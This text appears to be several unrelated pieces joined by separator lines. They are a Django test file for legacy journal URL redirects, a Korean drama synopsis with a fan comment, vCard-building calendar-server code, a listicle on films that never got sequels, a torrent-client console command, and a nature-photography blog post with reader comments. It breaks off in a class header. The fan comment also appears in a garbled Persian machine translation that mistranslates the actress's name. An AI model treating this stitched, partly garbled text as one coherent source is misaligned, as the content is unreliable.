url = '/en/revue/{journal_code}/{issue_year}/v/n{issue_number}/{article_localidentifier}.html'.format( # noqa
journal_code=article.issue.journal.code,
issue_year=article.issue.year,
issue_number=article.issue.number,
article_localidentifier=article.localidentifier
)
deactivate_all()
resp = Client().get(url)
assert resp.url == article_detail_url(article)
assert "/en/" in resp.url
assert resp.status_code == 301
@pytest.mark.parametrize("pattern", (
"/revue/{journal_code}/{year}/v{volume}/n{number}/",
"/culture/{journal_localidentifier}/{issue_localidentifier}/index.html"
))
def test_can_redirect_issues_from_legacy_urls(self, pattern):
article = ArticleFactory()
article.issue.volume = "1"
article.issue.number = "1"
article.issue.save()
url = pattern.format(
journal_code=article.issue.journal.code,
year=article.issue.year,
volume=article.issue.volume,
number=article.issue.number,
journal_localidentifier=article.issue.journal.localidentifier,
issue_localidentifier=article.issue.localidentifier,
article_localidentifier = article.localidentifier,
)
resp = Client().get(url)
assert resp.url == reverse('public:journal:issue_detail', kwargs=dict(
journal_code=article.issue.journal.code,
issue_slug=article.issue.volume_slug,
localidentifier=article.issue.localidentifier
))
assert resp.status_code == 301
def test_can_redirect_journals_from_legacy_urls(self):
article = ArticleFactory()
article.issue.volume = "1"
article.issue.number = "1"
article.issue.save()
url = "/revue/{code}/".format(
code=article.issue.journal.code,
)
resp = Client().get(url)
assert resp.url == journal_detail_url(article.issue.journal)
assert resp.status_code == 301
class TestArticleFallbackRedirection:
@pytest.fixture(params=itertools.product(
[{'code': 'nonexistent'}],
[
'legacy_journal:legacy_journal_detail',
'legacy_journal:legacy_journal_detail_index',
'legacy_journal:legacy_journal_authors',
'legacy_journal:legacy_journal_detail_culture',
'legacy_journal:legacy_journal_detail_culture_index',
'legacy_journal:legacy_journal_authors_culture'
]
))
def journal_url(self, request):
kwargs = request.param[0]
url = request.param[1]
return reverse(url, kwargs=kwargs)
@pytest.fixture(params=itertools.chain(
itertools.product(
[{
'journal_code': 'nonexistent',
'year': "1974",
'v': "7",
'n': "1",
}],
["legacy_journal:legacy_issue_detail", "legacy_journal:legacy_issue_detail_index"]
),
itertools.product(
[{
'journal_code': 'nonexistent',
'year': "1974",
'v': "7",
'n': "",
}],
[
"legacy_journal:legacy_issue_detail",
"legacy_journal:legacy_issue_detail_index"
],
),
itertools.product(
[{
'journal_code': 'nonexistent',
'year': "1974",
'v': "7",
'n': "",
}],
[
"legacy_journal:legacy_issue_detail",
"legacy_journal:legacy_issue_detail_index"
],
),
itertools.product([{
'journal_code': 'nonexistent',
'localidentifier': 'nonexistent'
}], ["legacy_journal:legacy_issue_detail_culture",
"legacy_journal:legacy_issue_detail_culture_index"],
)
))
def issue_url(self, request):
kwargs = request.param[0]
url = request.param[1]
return reverse(url, kwargs=kwargs)
@pytest.fixture(params=itertools.chain(
itertools.product(
[{
'journal_code': 'nonexistent', 'year': 2004, 'v': 1, 'issue_number': 'nonexistent',
'localid': 'nonexistent', 'format_identifier': 'html', 'lang': 'fr'
}],
[
"legacy_journal:legacy_article_detail",
"legacy_journal:legacy_article_detail_culture"
],
),
[
({'localid': 'nonexistent'}, 'legacy_journal:legacy_article_id'),
({'journal_code': 'nonexistent',
'issue_localid': 'nonexistent', 'localid': 'nonexistent',
'format_identifier': 'html'},
'legacy_journal:legacy_article_detail_culture_localidentifier')
]),
)
def article_url(self, request):
kwargs = request.param[0]
url = request.param[1]
return reverse(url, kwargs=kwargs)
def test_legacy_url_for_nonexistent_journals_404s(self, journal_url):
response = Client().get(journal_url, follow=True)
assert response.status_code == 404
def test_legacy_url_for_nonexistent_issues_404s(self, issue_url):
response = Client().get(issue_url, follow=True)
assert response.status_code == 404
def test_legacy_url_for_nonexistent_articles_404s(self, article_url):
response = Client().get(article_url, follow=True)
assert response.status_code == 404
class TestArticleXmlView:
def test_can_retrieve_xml_of_existing_articles(self):
journal = JournalFactory(open_access=True)
issue = IssueFactory.create(
journal=journal, year=2010, is_published=True,
date_published=dt.datetime.now() - dt.timedelta(days=1000))
article = ArticleFactory.create(issue=issue)
journal_id = issue.journal.localidentifier
issue_id = issue.localidentifier
article_id = article.localidentifier
url = reverse('public:journal:article_raw_xml', args=(
journal_id, issue.volume_slug, issue_id, article_id
))
response = Client().get(url)
assert response.status_code == 200
assert response['Content-Type'] == 'application/xml'
class TestArticleMediaView(TestCase):
@unittest.mock.patch.object(MediaDigitalObject, 'content')
def test_can_retrieve_the_pdf_of_existing_articles(self, mock_content):
# Setup
with open(os.path.join(FIXTURE_ROOT, 'pixel.png'), 'rb') as f:
mock_content.content = io.BytesIO()
mock_content.content.write(f.read())
mock_content.mimetype = 'image/png'
issue = IssueFactory.create(date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue)
issue_id = issue.localidentifier
article_id = article.localidentifier
request = RequestFactory().get('/')
# Run
response = ArticleMediaView.as_view()(
request, journal_code=issue.journal.code, issue_localid=issue_id,
localid=article_id, media_localid='test')
# Check
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'image/png')
class TestExternalURLRedirectViews:
def test_can_redirect_to_issue_external_url(self):
issue = IssueFactory.create(
date_published=dt.datetime.now(),
external_url="http://www.erudit.org"
)
response = Client().get(
reverse(
'public:journal:issue_external_redirect',
kwargs={'localidentifier': issue.localidentifier}
)
)
assert response.status_code == 302
def test_can_redirect_to_journal_external_url(self):
journal = JournalFactory(code='journal1', external_url='http://www.erudit.org')
response = Client().get(
reverse(
'public:journal:journal_external_redirect',
kwargs={'code': journal.code}
)
)
assert response.status_code == 302
@pytest.mark.parametrize('export_type', ['bib', 'enw', 'ris'])
def test_article_citation_doesnt_html_escape(export_type):
# citations exports don't HTML-escape values (they're not HTML documents).
# TODO: test authors name. Templates directly refer to `erudit_object` and we we don't have
# a proper mechanism in the upcoming fake fedora API to fake values on the fly yet.
title = "rock & rollin'"
article = ArticleFactory.create(title=title)
issue = article.issue
url = reverse('public:journal:article_citation_{}'.format(export_type), kwargs={
'journal_code': issue.journal.code, 'issue_slug': issue.volume_slug,
'issue_localid': issue.localidentifier, 'localid': article.localidentifier})
response = Client().get(url)
content = response.content.decode()
assert title in content
@pytest.mark.parametrize("view_name", (
"article_detail",
"article_summary",
"article_biblio",
"article_toc",
))
def test_no_html_in_structured_data(view_name):
article = ArticleFactory(
from_fixture="038686ar",
localidentifier="article",
issue__localidentifier="issue",
issue__year="2019",
issue__journal__code="journal",
)
url = reverse(f"public:journal:{view_name}", kwargs={
"journal_code": article.issue.journal.code,
"issue_slug": article.issue.volume_slug,
"issue_localid": article.issue.localidentifier,
"localid": article.localidentifier,
})
response = Client().get(url)
content = response.content.decode()
expected = '{\n ' \
'"@type": "ListItem",\n ' \
'"position": 5,\n ' \
'"item": {\n ' \
'"@id": "http://example.com/fr/revues/journal/2019-issue/article/",\n ' \
'"name": "Constantin, François (dir.), Les biens publics mondiaux. ' \
'Un mythe légitimateur pour l’action collective\xa0?, ' \
'coll. Logiques politiques, Paris, L’Harmattan, 2002, 385\xa0p."\n ' \
'}\n ' \
'}'
assert expected in content
|
Royal Physician Choi Won, who works for the royal family, becomes involved with the plot to poison King Injong and is now a fugitive. He tries to save his daughter, Choi Rang, who has an incurable disease. Choi Won has raised his daughter alone since his wife passed away. Hong Da In is the nurse who’s in love with him.
Meanwhile, Lee Jung Hwan is the Euigeumbu detective who’s the one to capture him and he gets help from bandit’s daughter, So Baek, while he is a fugitive. Crown Prince Lee Ho is the suspicious crown prince who ends up thinking he was betrayed by the one person he trusted in the world.
آهنگ جی هیو (دا در) در مقایسه با رنگ پریده! من فکر می کنم همه کسانی که تماشا می کردند بیشتر درباره رابطه خود مراقبت می کنند و این به سادگی به علت شیمی است. سونگ وونگ به عنوان “ماه” به سادگی در سراسر نمایشنامه به عنوان مرید پدر پدر Da In به من ایستاد. شما می خواستید از او متنفر باشید، اما به سادگی نمی تواند کمک کند اما او را دوست دارد و زیبایی (و واقعی) خود را از شکوه و عظمت! نام او را به خاطر می آورم.
Song Ji Hyo (Da In) pale in comparison! I think everyone who watched cared more about their relationship and that’s simply because of chemistry. Sung Woong as Do Moon simply stood out to me throughout the drama as Da In’s father’s henchman. You wanted to hate him but simply couldn’t help but love him and his beautiful (and real) mane of glory! I will remember his name for now on.
|
##
# Copyright (c) 2006-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Utilities to converting a Record to a vCard
"""
__all__ = [
"vCardFromRecord"
]
from pycalendar.vcard.adr import Adr
from pycalendar.vcard.n import N
from twext.python.log import Logger
from twext.who.idirectory import FieldName, RecordType
from twisted.internet.defer import inlineCallbacks, returnValue
from twistedcaldav.config import config
from twistedcaldav.vcard import Component, Property, vCardProductID
from txdav.who.idirectory import FieldName as CalFieldName, \
RecordType as CalRecordType
from txweb2.dav.util import joinURL
log = Logger()
recordTypeToVCardKindMap = {
RecordType.user: "individual",
RecordType.group: "group",
CalRecordType.location: "location",
CalRecordType.resource: "device",
}
vCardKindToRecordTypeMap = {
"individual": RecordType.user,
"group": RecordType.group,
"org": RecordType.group,
"location": CalRecordType.location,
"device": CalRecordType.resource,
}
# all possible generated parameters.
vCardPropToParamMap = {
# "PHOTO": {"ENCODING": ("B",), "TYPE": ("JPEG",), },
"ADR": {"TYPE": ("WORK", "PREF", "POSTAL", "PARCEL",),
"LABEL": None, "GEO": None, },
"LABEL": {"TYPE": ("POSTAL", "PARCEL",)},
# "TEL": {"TYPE": None, }, # None means param value can be anything
"EMAIL": {"TYPE": None, },
# "KEY": {"ENCODING": ("B",), "TYPE": ("PGPPUBILICKEY", "USERCERTIFICATE", "USERPKCS12DATA", "USERSMIMECERTIFICATE",)},
# "URL": {"TYPE": ("WEBLOG", "HOMEPAGE",)},
# "IMPP": {"TYPE": ("PREF",), "X-SERVICE-TYPE": None, },
# "X-ABRELATEDNAMES": {"TYPE": None, },
# "X-AIM": {"TYPE": ("PREF",), },
# "X-JABBER": {"TYPE": ("PREF",), },
# "X-MSN": {"TYPE": ("PREF",), },
# "X-ICQ": {"TYPE": ("PREF",), },
}
vCardConstantProperties = {
# ====================================================================
# 3.6 EXPLANATORY TYPES http://tools.ietf.org/html/rfc2426#section-3.6
# ====================================================================
# 3.6.3 PRODID
"PRODID": vCardProductID,
# 3.6.9 VERSION
"VERSION": "3.0",
}
@inlineCallbacks
def vCardFromRecord(record, forceKind=None, addProps=None, parentURI=None):
def isUniqueProperty(newProperty, ignoredParameters={}):
existingProperties = vcard.properties(newProperty.name())
for existingProperty in existingProperties:
if ignoredParameters:
existingProperty = existingProperty.duplicate()
for paramName, paramValues in ignoredParameters.iteritems():
for paramValue in paramValues:
existingProperty.removeParameterValue(paramName, paramValue)
if existingProperty == newProperty:
return False
return True
def addUniqueProperty(newProperty, ignoredParameters=None):
if isUniqueProperty(newProperty, ignoredParameters):
vcard.addProperty(newProperty)
else:
log.info(
"Ignoring property {prop!r} it is a duplicate",
prop=newProperty
)
# =======================================================================
# start
# =======================================================================
log.debug(
"vCardFromRecord: record={record}, forceKind={forceKind}, addProps={addProps}, parentURI={parentURI}",
record=record, forceKind=forceKind, addProps=addProps, parentURI=parentURI)
if forceKind is None:
kind = recordTypeToVCardKindMap.get(record.recordType, "individual")
else:
kind = forceKind
constantProperties = vCardConstantProperties.copy()
if addProps:
for key, value in addProps.iteritems():
if key not in constantProperties:
constantProperties[key] = value
# create vCard
vcard = Component("VCARD")
# add constant properties
for key, value in constantProperties.items():
vcard.addProperty(Property(key, value))
# ===========================================================================
# 2.1 Predefined Type Usage
# ===========================================================================
# 2.1.4 SOURCE Type http://tools.ietf.org/html/rfc2426#section-2.1.4
if parentURI:
uri = joinURL(parentURI, record.fields[FieldName.uid].encode("utf-8") + ".vcf")
# seems like this should be in some standard place.
if (config.EnableSSL or config.BehindTLSProxy) and config.SSLPort:
if config.SSLPort == 443:
source = "https://{server}{uri}".format(server=config.ServerHostName, uri=uri)
else:
source = "https://{server}:{port}{uri}".format(server=config.ServerHostName, port=config.SSLPort, uri=uri)
else:
if config.HTTPPort == 80:
source = "https://{server}{uri}".format(server=config.ServerHostName, uri=uri)
else:
source = "https://{server}:{port}{uri}".format(server=config.ServerHostName, port=config.HTTPPort, uri=uri)
vcard.addProperty(Property("SOURCE", source))
# =======================================================================
# 3.1 IDENTIFICATION TYPES http://tools.ietf.org/html/rfc2426#section-3.1
# =======================================================================
# 3.1.1 FN
vcard.addProperty(Property("FN", record.fields[FieldName.fullNames][0].encode("utf-8")))
# 3.1.2 N
# TODO: Better parsing
fullNameParts = record.fields[FieldName.fullNames][0].split()
first = fullNameParts[0] if len(fullNameParts) >= 2 else None
last = fullNameParts[len(fullNameParts) - 1]
middle = fullNameParts[1] if len(fullNameParts) == 3 else None
prefix = None
suffix = None
nameObject = N(
first=first.encode("utf-8") if first else None,
last=last.encode("utf-8") if last else None,
middle=middle.encode("utf-8") if middle else None,
prefix=prefix.encode("utf-8") if prefix else None,
suffix=suffix.encode("utf-8") if suffix else None,
)
vcard.addProperty(Property("N", nameObject))
# 3.1.3 NICKNAME
nickname = record.fields.get(CalFieldName.abbreviatedName)
if nickname:
vcard.addProperty(Property("NICKNAME", nickname.encode("utf-8")))
# UNIMPLEMENTED
# 3.1.4 PHOTO
# 3.1.5 BDAY
# ============================================================================
# 3.2 Delivery Addressing Types http://tools.ietf.org/html/rfc2426#section-3.2
# ============================================================================
# 3.2.1 ADR
#
# Experimental:
# Use vCard 4.0 ADR: http://tools.ietf.org/html/rfc6350#section-6.3.1
params = {}
geo = record.fields.get(CalFieldName.geographicLocation)
if geo:
params["GEO"] = geo.encode("utf-8")
label = record.fields.get(CalFieldName.streetAddress)
if label:
params["LABEL"] = label.encode("utf-8")
#
extended = record.fields.get(CalFieldName.floor)
# TODO: Parse?
street = record.fields.get(CalFieldName.streetAddress)
city = None
region = None
postalcode = None
country = None
if extended or street or city or region or postalcode or country or params:
params["TYPE"] = ["WORK", "PREF", "POSTAL", "PARCEL", ]
vcard.addProperty(
Property(
"ADR", Adr(
# pobox = box,
extended=extended.encode("utf-8") if extended else None,
street=street.encode("utf-8") if street else None,
locality=city.encode("utf-8") if city else None,
region=region.encode("utf-8") if region else None,
postalcode=postalcode.encode("utf-8") if postalcode else None,
country=country.encode("utf-8") if country else None,
),
params=params
)
)
# 3.2.2 LABEL
# label = record.fields.get(CalFieldName.streetAddress)
if label:
vcard.addProperty(Property("LABEL", label.encode("utf-8"), params={"TYPE": ["POSTAL", "PARCEL", ]}))
# ======================================================================================
# 3.3 TELECOMMUNICATIONS ADDRESSING TYPES http://tools.ietf.org/html/rfc2426#section-3.3
# ======================================================================================
#
# UNIMPLEMENTED
# 3.3.1 TEL
# 3.3.2 EMAIL
preferredWorkParams = {"TYPE": ["WORK", "PREF", "INTERNET", ], }
workParams = {"TYPE": ["WORK", "INTERNET", ], }
params = preferredWorkParams
for emailAddress in record.fields.get(FieldName.emailAddresses, ()):
addUniqueProperty(Property("EMAIL", emailAddress.encode("utf-8"), params=params), ignoredParameters={"TYPE": ["PREF", ]})
params = workParams
# UNIMPLEMENTED:
# 3.3.3 MAILER
#
# =====================================================================
# 3.4 GEOGRAPHICAL TYPES http://tools.ietf.org/html/rfc2426#section-3.4
# =====================================================================
#
# UNIMPLEMENTED:
# 3.4.1 TZ
#
# 3.4.2 GEO
geographicLocation = record.fields.get(CalFieldName.geographicLocation)
if geographicLocation:
vcard.addProperty(Property("GEO", geographicLocation.encode("utf-8")))
# =======================================================================
# 3.5 ORGANIZATIONAL TYPES http://tools.ietf.org/html/rfc2426#section-3.5
# =======================================================================
#
# UNIMPLEMENTED:
# 3.5.1 TITLE
# 3.5.2 ROLE
# 3.5.3 LOGO
# 3.5.4 AGENT
# 3.5.5 ORG
#
# ====================================================================
# 3.6 EXPLANATORY TYPES http://tools.ietf.org/html/rfc2426#section-3.6
# ====================================================================
#
# UNIMPLEMENTED:
# 3.6.1 CATEGORIES
# 3.6.2 NOTE
#
# ADDED WITH CONTSTANT PROPERTIES:
# 3.6.3 PRODID
#
# UNIMPLEMENTED:
# 3.6.5 SORT-STRING
# 3.6.6 SOUND
# 3.6.7 UID
vcard.addProperty(Property("UID", record.fields[FieldName.uid].encode("utf-8")))
# UNIMPLEMENTED:
# 3.6.8 URL
# ADDED WITH CONTSTANT PROPERTIES:
# 3.6.9 VERSION
# ===================================================================
# 3.7 SECURITY TYPES http://tools.ietf.org/html/rfc2426#section-3.7
# ===================================================================
# UNIMPLEMENTED:
# 3.7.1 CLASS
# 3.7.2 KEY
# ===================================================================
# X Properties
# ===================================================================
# UNIMPLEMENTED:
# X-<instant messaging type> such as:
# "AIM", "FACEBOOK", "GAGU-GAGU", "GOOGLE TALK", "ICQ", "JABBER", "MSN", "QQ", "SKYPE", "YAHOO",
# X-MAIDENNAME
# X-PHONETIC-FIRST-NAME
# X-PHONETIC-MIDDLE-NAME
# X-PHONETIC-LAST-NAME
# X-ABRELATEDNAMES
# X-ADDRESSBOOKSERVER-KIND
if kind == "group":
vcard.addProperty(Property("X-ADDRESSBOOKSERVER-KIND", kind))
# add members
# FIXME: members() is a deferred, so all of vCardFromRecord is deferred.
for memberRecord in (yield record.members()):
cua = memberRecord.canonicalCalendarUserAddress(False)
if cua:
vcard.addProperty(Property("X-ADDRESSBOOKSERVER-MEMBER", cua.encode("utf-8")))
# ===================================================================
# vCard 4.0 http://tools.ietf.org/html/rfc6350
# ===================================================================
# UNIMPLEMENTED:
# 6.4.3 IMPP http://tools.ietf.org/html/rfc6350#section-6.4.3
#
# 6.1.4 KIND http://tools.ietf.org/html/rfc6350#section-6.1.4
#
# see also: http://www.iana.org/assignments/vcard-elements/vcard-elements.xml
#
vcard.addProperty(Property("KIND", kind))
# one more X- related to kind
if kind == "org":
vcard.addProperty(Property("X-ABShowAs", "COMPANY"))
log.debug("vCardFromRecord: vcard=\n{vcard}", vcard=vcard)
returnValue(vcard)
|
Sometimes, it's obvious to all concerned that they're onto an absolute winner. "This film will make Star Wars look like a flop" they cry.
"And seeing as there's definitely going to be a sequel or two, we may as well set it up nicely so that the whole thing flows properly when hordes of fans watch the trilogy in one sitting in ten years' time".
Bless their optimism, but it doesn't always work out like that. Here's ten films that were begging to be continued, but were left hanging in the wind, like a broken street sign which solemnly reads "No Chance Close (Cul de Sac)".
Considering Nintendo have put every spin that it is possible to have on their most bankable stars - the lovable Italian plumbers Mario and Luigi - creating a gargantuan franchise in the meantime, it must surely have been the intention to do the same with the movies. Unfortunately the tiny dual problems of shocking reviews and box office failure put paid to that idea and so, we'll never get to find out what was out there in that final scene. To be fair, we can probably cope.
It's surprising that a sequel was never made for Godzilla - true, it received something of a critical mauling, but it did well enough at the box office, which is usually all that Hollywood really cares about. It was particularly strange considering the ending had been specifically engineered to lead straight on to a second installment. Yes guys, you've definitely killed all the offspring and destroyed all the eggs. All of them. Definitely. No oversights there. Oh, no.
Now this really is a salient lesson in the perils of misplaced confidence. This film was so bolshy that it told viewers to stay tuned for the next episode, Buckaroo Banzai Against the World Crime League, but red faces no doubt ensued when it failed to materialise. The one and only film has become something of a cult classic, however, so maybe one day the long-awaited sequel will be made; in the meantime, fans can just enjoy what is undoubtedly one of the coolest end credit sequences ever.
It is a mystery that probably only The Incredibles can solve; why has there still not been a sequel to this film? It was, as is usual for a Pixar movie, critically acclaimed, it was a huge box office success, grossing over $600m against a $92m budget, and the final scene featured a brand new villain, 'The Underminer' arriving from beneath the ground, ready for another dust-up. However, it seems that writer and director Brad Bird holds the key: he is on record as saying he'll only do another one if it "is as good or better than the original" and he feels he hasn't had the time to come up with a strong enough story yet. Fair enough Brad, we'll wait a little longer.
Okay so maybe not a huge surprise why this sequel didn't happen. It wasn't a complete box office disaster ($179 million worldwide from a $78 million budget) but legal wrangles and, okay, the fact that most people hated the first one have stalled a follow-up. Shame, as the end left the movie perfectly set up, with a stricken Bullseye showing that he has not lost his aim, and could live to fight another day.
Despite a huge cult following and two versions of the final scene which both lent themselves to a sequel, nothing has been forthcoming. The original ending saw a lone alien slug survive in a dog's mouth, while the alternate one saw hordes of them survive via Cameron's body, with their parent aliens returning to earth for good measure. It's been 17 years though so we're not holding our breath; the Stereo MCs made their second album quicker than that.
Oh, The Golden Compass, we had such high hopes for you. The first novel in a trilogy of books by Phillip Pullman, this was slated to become a franchise to rival Lord of the Rings, but the project ground to a halt after disappointing (though not disastrous) box office returns. All of which is a shame for fans of the first movie, as producers were so sure that there'd be a followup that they didn't feel the need to put in final scenes which they felt, ironically, were somewhat controversial and so might scupper the next two films, leading to a rather abrupt ending. Bizarrely they made it into the video game adaptation, so at least there was some closure.
Possibly the most pure of the examples on this list. "I'll be back" croaks Skeletor, like an anorexic Arnold Schwarzenegger. Not with box office takings like that you won't boneface.
Clip in comedy German accent below, in English here.
Why do they do it? Why? The end scene featured our "heroes" driving away in a pink cadillac as a cartoon speech bubble cheerily proclaimed "We'll be back!". Unfortunately, abysmal reviews, terrible ticket sales and heavy criticism that the film was a poorly-disguised rip-off of E.T. meant that that cadillac kept riding off into the distance forever.
An earnest, albeit slightly hair-brained attempt to create an American spin on The Ring, this horror saw teens playing an evil video game ("you die in the game, you die for real"). The end scene saw an unwitting video game store employee inserts the game and start the sequence again; prime fodder to lead on to recurring installments of the franchise. Unfortunately for Stay Alive, they only got one life, there was no restart button, it really was game over after this and we've run out of gaming metaphors now.
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Nick Lanham <nick@afternight.org>
#
# This file is part of Deluge and is licensed under GNU General Public License 3.0, or later, with
# the additional special exception to link portions of this program with the OpenSSL library.
# See LICENSE for more details.
#
from __future__ import unicode_literals
import logging
import os.path
import deluge.component as component
from deluge.ui.client import client
from . import BaseCommand
log = logging.getLogger(__name__)
class Command(BaseCommand):
"""Move torrents' storage location"""
def add_arguments(self, parser):
parser.add_argument('torrent_ids', metavar='<torrent-id>', nargs='+', help=_('One or more torrent ids'))
parser.add_argument('path', metavar='<path>', help=_('The path to move the torrents to'))
def handle(self, options):
self.console = component.get('ConsoleUI')
if os.path.exists(options.path) and not os.path.isdir(options.path):
self.console.write('{!error!}Cannot Move Download Folder: %s exists and is not a directory' % options.path)
return
ids = []
names = []
for t_id in options.torrent_ids:
tid = self.console.match_torrent(t_id)
ids.extend(tid)
names.append(self.console.get_torrent_name(tid))
def on_move(res):
msg = 'Moved "%s" to %s' % (', '.join(names), options.path)
self.console.write(msg)
log.info(msg)
d = client.core.move_storage(ids, options.path)
d.addCallback(on_move)
return d
def complete(self, line):
line = os.path.abspath(os.path.expanduser(line))
ret = []
if os.path.exists(line):
# This is a correct path, check to see if it's a directory
if os.path.isdir(line):
# Directory, so we need to show contents of directory
# ret.extend(os.listdir(line))
for f in os.listdir(line):
# Skip hidden
if f.startswith('.'):
continue
f = os.path.join(line, f)
if os.path.isdir(f):
f += '/'
ret.append(f)
else:
# This is a file, but we could be looking for another file that
# shares a common prefix.
for f in os.listdir(os.path.dirname(line)):
if f.startswith(os.path.split(line)[1]):
ret.append(os.path.join(os.path.dirname(line), f))
else:
# This path does not exist, so lets do a listdir on it's parent
# and find any matches.
ret = []
if os.path.isdir(os.path.dirname(line)):
for f in os.listdir(os.path.dirname(line)):
if f.startswith(os.path.split(line)[1]):
p = os.path.join(os.path.dirname(line), f)
if os.path.isdir(p):
p += '/'
ret.append(p)
return ret
|
When I first thought about starting a photography magazine I had to consider what kind of subject matter it would cover. Sitting right next to the most visited National Park in the United States, it only made sense to have nature photography as a major component. That just moved the question one step further down the line. What is nature photography? There doesn’t seem to be an easy answer.
Researching information online showed that there were some strong feelings on the topic. One school of thought is that nature photography, particularly wildlife photography, should be documentary and should have little post capture work done to it. The other school looks at photography as art and allows for more freedom in the interpretation of the image. Individual photographers fall all along that continuum. A few don’t even sharpen wildlife images and a few pass off composites as wildlife, but most are somewhere in between.
The Audubon Society has an interesting posting of the poll result they received from thousands of people they questioned after they disqualified an image from their contest for being a composite image. Twenty-six present of the respondents thought that Ansel Adams’ images were not nature photography because he dodged and burned in the darkroom. Sixty-six percent thought that the National Geographic cover that moved the pyramids around was ethical or ethical if there was a disclaimer. Seventy-two present thought that baiting was either ok or ok if there was a disclosure of the use of bait. It was about half and half on whether game farm shots were nature photography.
Exploring my own feelings revealed that I believe both points of view are valid as long as the photographer makes it clear what was done to the image. Each individual can determine what he/she thinks is nature photography and what is art. There is a place in the world for both. We need scientific study of nature and journalist presentations of the results. We also need beautiful images to inspire people to commit to saving the environment as Ansel Adams’ work did.
Regardless of whether a particular image is journalistic or art, it needs to be captured in an ethical fashion. The North American Nature Photography Association and the American Birding Association each have a Code of Ethics that provide guidelines on how to act. The Park has regulations on how far to stay away from bears and elk (50 yards) and how to interact with other life in the fields. We all learn to leave nothing but footprints. No image is worth harming the subject.
Take a look at the humming bird image above. It is a composite. I took a shot of a hummingbird visiting one of our feeders and combined it with a flower from our neighbor’s yard that humming birds do visit. Is this a wildlife image? I don’t think so. I wouldn’t enter it in a wildlife contest. Is it an art image? I think it is ok as an art image as long as I don’t call it wildlife. Whether you like the actual composite image or not, what is your opinion of the concept. I’m guessing that opinions will be all across the spectrum.
It must be common practice to do this. I always wondered how these images were captured. I’ve been in awe of the skill and good fortune that I believed it took to do so. Now I know that post processing and combining images in Photoshop, I guess, is as important as learning to use your camera. I’m not at that level where I can create a photo and it does feel a little like cheating because you never know what’s real.
You are right, Pat, it is hard to know these days. It might be possible to get enough shutter speed to freeze the humming bird and get enough depth of field to get all the flower in focus and have a pleasing background, but it would be hard. A lot of pictures are post processed or captured in unique places were they are easier than in a normal wildlife situation. It leaves us with the question of whether it is sill OK as art if we are honest about the way the image was made.
I have to agree with the distinction between nature photography and art photography.
Do those take a nature shot and turn it into an art shot?
Difficult questions. For now, for me, a photo is less to be representational, and more inspirational. I’m not capturing a moment, I’m capturing and emotion.
No real solution… just thoughts.
This is not new to digital processing. Ansel Adams was a master at dodging and burning in the dark room. i have seen straight prints of his negatives as examples and they are not as remarkable as the image he created with his manipulations in the dark room. There are examples of replacing the sky in film images also. This didn’t just start with Photoshop. There is a place for journalism, but I think most people want beautiful art on their walls and not a field guide picture.
I can’t afford those programs and probably don’t have the patience to learn them. I am able to do the basics on iPhoto. I seldom print anything so my images I share online with friends. I’m not against those who Photoshop,Lightroom, or whatever. I just want to enjoy what is shared.We each have our own way of seeing,interpreting,and revealing the GSMNP to others. I do hope others like my “vision” and it is ego fulfilling to a point.
It is a big world with room for many different approaches. We can all enjoy photography in our own way.
I did a double-take when I first saw this photo. I thought the Cypress Vine flower was very large or the hummingbird was quite small! 🙂 Interesting effect.
I have always been a believer in getting a much “in the box” as possible. I learned Photoshop basic (CS3) so that I could adjust images that needed a little help – primarily from shooting under less than optimal conditions. It’s nice to know what you can do to “fix” an image. Normal enhancements (cropping, saturation, dark/light and sharpening) are a necessary fact of life with a digital camera’s limitations. I object when images are distorted or have major color shifts (sunrises/sunsets!). Composites are fun, but they’re not photography – closed to scrapbooking in my opinion). All tha said, a pleasing image is a pleasing image. If the photgrapher/artist owns up to what has been done, it’s fine. A lot of us are limited in the wilderness available to us. I like to shoot at zoos and I have entered the images in contest, with the disclaimer that it is a zoo shot.
I like to shoot backyard birds and critters. I don’t “bait” – but we do run feeders for the birds. Is a Thrasher or a Towhee in the bushes and beds of a backyard any less “wildlife” than a moose in the field?
Final thought is that whatever is fun for the shooter is probably OK, just tell folks what was done to capture the image if you want to pass it off.
Thanks for the forum _I have had the same debate over “macro” photography.
I agree. Truth is the important thing.
This is my first time reading feedback on photography. My conclusion is I have been so naive and have a lot to learn. Tyson, thank you very much for all your hard work and sharing it to everyone. Thank you everyone for your feedback.
My goodness; so much fuss over the distinction between “Nature Photography” and “Art Photography.” All of the really great nature photographs require tremendous personal sacrifice to be in the right place at the right time coupled with skillful manipulation of the best equipment, or blind fool’s luck to have been there by accident. I pray for the opportunity to be God’s photojournalist and am often rewarded with photo ops just for paying attention to His works. The beauty isn’t mine; it’s His creation. Should I not polish it up the best I can?
To enhance a photograph by whatever means the artist has mastered is by no means a crime. Post processing provides a much needed extention of the media’s inherent limitations. I say if you don’t engage in post processing you are only half an artist. The bone of contention arises when elements are added that weren’t there to begin with. Photojournalism requires compliance to strictly recording the scene fully intact; nothing added or subtracted. Just the truth of what was there at that instant.
Hey, photojournalism isn’t art! If a photographer wishes to be respected as an artist, manipulation of the final product is required. It is, in fact, the measure of his art. There are great technicians and great artists. So which do you want to be?
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 S2S Network Consultoria e Tecnologia da Informacao LTDA
#
# Author: Zhongjie Wang <wzj401@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import cPickle
from umit.icm.agent.logger import g_logger
from umit.icm.agent.Global import *
from umit.icm.agent.Application import theApp
from umit.icm.agent.Version import PEER_TYPE
"""
This classes contains the information about the peer. This class is not used to represent other peers.
It should only used to represent the connected peer.
"""
class PeerInfo(object):
""""""
#----------------------------------------------------------------------
def __init__(self):
